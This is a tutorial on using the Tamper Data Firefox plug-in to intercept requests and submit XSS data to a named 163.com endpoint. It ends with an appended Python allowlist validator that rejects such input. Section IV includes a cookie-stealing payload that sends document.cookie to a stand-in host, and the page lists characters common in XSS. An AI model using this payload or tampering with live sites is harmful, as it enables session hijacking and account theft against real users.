Use Tamper Data to submit XSS attack data
1. Introduction
Tamper Data is a Firefox plug-in that is easy to use and powerful. It can view and modify HTTP/HTTPS headers and POST parameters, simulate web attacks, and track HTTP requests and responses together with their timing.
II. Use
Tamper Data provides request monitoring and request modification.
2.1 Request monitoring
The tool window is divided into:
Monitoring window:
All HTTP requests sent from web pages opened in Firefox tabs, and their corresponding responses, are monitored by Tamper Data (default state).
The lower-left window shows the request headers of each request, similar to Firebug.
The lower-right window shows the response headers of each request, similar to Firebug. The response body is shown by right-clicking the HTTP request and choosing View Source.
Note: Filter limits the display to requests for a specified domain name.
2.2 Request interception
After you click Start Tamper, a window pops up:
Click Tamper:
Right-click a request to add a new request parameter or request header; right-click a parameter name to open a menu with XSS/SQL/data options (the XSS option contains pre-defined XSS scripts), or directly modify the value of the parameter. Click OK to submit the request.
XSS attack example
Example interface, Custom Skin: http://t.163.com/user.do?Action=updateUserConfig, used to submit illegal data (XSS).
Start Tamper and click Save on the page.
(The original post showed screenshots here: the pop-up window, the Tamper operation, the modified request, and the result after submission.)
The server returns 555: illegal data submission is rejected by the back end.
Principle:
III. Tamper Data options
Image blocking is disabled by default; enable it under Options. You can also add custom data to the context menu.
IV. Introduction to XSS
Discussion on the application of reflected XSS: http://www.bkjia.com/Article/201006/51228.html
XSS attack based on CSRF: http://www.bkjia.com/Article/200811/30675.html
Anehta -- Boomerang (rollback), how to turn reflected XSS into persistent XSS, on cross-origin cookie retrieval: http://www.bkjia.com/Article/200810/30105.html
XSS attack, cookie spoofing and hidden JavaScript execution: http://www.bkjia.com/kf/200611/15445.html
Example (http://t.163.com/nathanliu): javascript:alert(document.cookie); or, if the URL contains a script such as: document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie)
Cross-Site Scripting (XSS) and CSRF (WebGoat notes): http://www.bkjia.com/Article/201212/178487.html
XSS attack (Baidu Baike): http://baike.baidu.com/view/2161269.htm
Characters commonly used in XSS attacks:
[1] <> (angle brackets)
[2] " (double quote)
[3] ' (single quote)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parentheses)
[7] & (ampersand)
[8] + (plus sign)
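The server-side counterpart of the two points above (the 555 rejection of the tampered updateUserConfig submission in section 2.2, and the character list just given) is shown below as an added Python example; it is not code from the original post or from the 163.com service. The page only names the endpoint, so the form field name "skin", its length limit and its allowed alphabet are assumptions. The check is an allowlist match rather than a search for the listed characters, which are reported only for logging, and the accepted value is still HTML-escaped at the output sink.

```python
import html
import re
from urllib.parse import parse_qs

# The characters from the eight items listed above as common in XSS payloads.
XSS_SIGNIFICANT = frozenset('<>"\'%;()&+')

# Assumptions: the page names only the endpoint (user.do?Action=updateUserConfig),
# so the field name, length limit and allowed alphabet below are made up for this example.
SKIN_FIELD = "skin"
MAX_SKIN_LEN = 64
ALLOWED_SKIN = re.compile(r"[A-Za-z0-9_-]+")


def flagged_characters(value: str) -> set:
    """Return the subset of XSS_SIGNIFICANT present in value (for logging, not for blocking)."""
    return {c for c in value if c in XSS_SIGNIFICANT}


def validate_user_config(body: str) -> tuple:
    """Check one updateUserConfig POST body (application/x-www-form-urlencoded).

    Returns (status, detail). 555 mirrors the status the page reports for a rejected
    submission. The decision is an allowlist match, so a value altered in a tamper
    tool (pre-defined scripts, URL-encoded variants, extra characters) is refused
    before it reaches storage.
    """
    params = parse_qs(body, keep_blank_values=True)  # also decodes %XX and '+'
    values = params.get(SKIN_FIELD)
    if not values:
        return 400, "missing skin parameter"
    skin = values[0]
    if len(skin) > MAX_SKIN_LEN:
        return 555, "skin value too long"
    if not ALLOWED_SKIN.fullmatch(skin):
        bad = "".join(sorted(flagged_characters(skin)))
        detail = (f"illegal characters in skin value: {bad!r}" if bad
                  else "skin value outside allowed alphabet")
        return 555, detail
    return 200, skin


def render_skin_attr(skin: str) -> str:
    """Output encoding for the accepted value: escaping at the sink still holds
    if the input check above is later loosened or bypassed."""
    return f'<div class="skin-{html.escape(skin, quote=True)}">'


if __name__ == "__main__":
    # Constructed request bodies: a normal save and two tampered submissions.
    for body in ("skin=dark_blue",
                 "skin=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E",
                 "skin=blue%22+onmouseover%3Dalert(1)"):
        print(body, "->", validate_user_config(body))
```

Running the block prints 200 for the normal save and 555 for both tampered bodies, with the listed characters that were found; a 555 in the server log for this endpoint is also a usable signal that a request was modified after the page generated it.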